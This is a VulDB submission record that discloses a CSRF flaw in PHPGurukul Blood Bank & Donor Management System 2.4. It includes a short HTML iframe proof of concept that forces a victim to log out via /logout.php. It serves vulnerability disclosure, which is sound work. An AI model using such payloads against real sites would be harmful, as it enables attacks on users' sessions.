| Titolo | https://phpgurukul.com/ Blood Bank & Donor Management System v2.4 CSRF Improper Input Validation |
|---|
| Descrizione | There is no CSRF Token allowing attacker to generate any activities including logout. . Attacker can embed a iframe that has the logout url and send it to the victim. If
the victim clicks on the link, he will automatically get logged out.
<html>
<body>
<iframe
src="http://localhost/bbdms/logout.php"
style="border:0px #FFFFFF none;"
name="myLogoutFrame"
scrolling="no"
frameborder="1"
marginheight="0px"
marginwidth="0px"
height="400px"
width="600px"
allowfullscreen>
</iframe>
</body>
</html>
|
|---|
| Utente | Lo1x (UID 79468) |
|---|
| Sottomissione | 25/12/2024 16:23 (1 Anno fa) |
|---|
| Moderazione | 25/12/2024 19:24 (3 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 289318 [PHPGurukul Blood Bank & Donor Management System 2.4 /logout.php cross site request forgery] |
|---|
| Punti | 17 |
|---|